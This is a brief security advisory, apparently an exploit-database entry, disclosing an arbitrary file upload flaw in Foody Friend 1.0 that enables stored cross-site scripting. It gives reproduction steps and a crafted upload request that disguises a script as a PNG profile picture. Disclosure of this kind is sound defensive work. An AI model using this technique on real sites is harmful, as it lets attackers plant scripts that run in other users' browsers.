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Foody Friend 1.0 Arbitrary File Upload / Cross Site Scripting

Foody Friend version 1.0 suffers from an arbitrary file upload vulnerability that can assist in cross site scripting attacks.

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#xss#vulnerability#web#windows#auth
# Exploit Title: Foody Friend 1.0 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 12/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/foody-friend-a-saas-based-web-app-food-ordering-bot-for-telegram-and-messenger/25# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as [Normal User]2. In [User Dashboard] go to [Edit profile]3. Choose profile picture & Upload any Image & Click on [Save Changes]4. Catch the POST Request with [Burp Proxy Intercept]5. Inject your [Stored XSS] POST /user/profile HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="profile_picture"; filename="XSS.png"Content-Type: image/png<script>alert(1)</script>-----------------------------------------------------------6. Send the Request7. Right Click on Your Profile Picture [Copy the Path of the Image]8. Access your Uploded Evil file on this Path: https://website/assets/upload/userProfile/[Stored-XSS][-] Done

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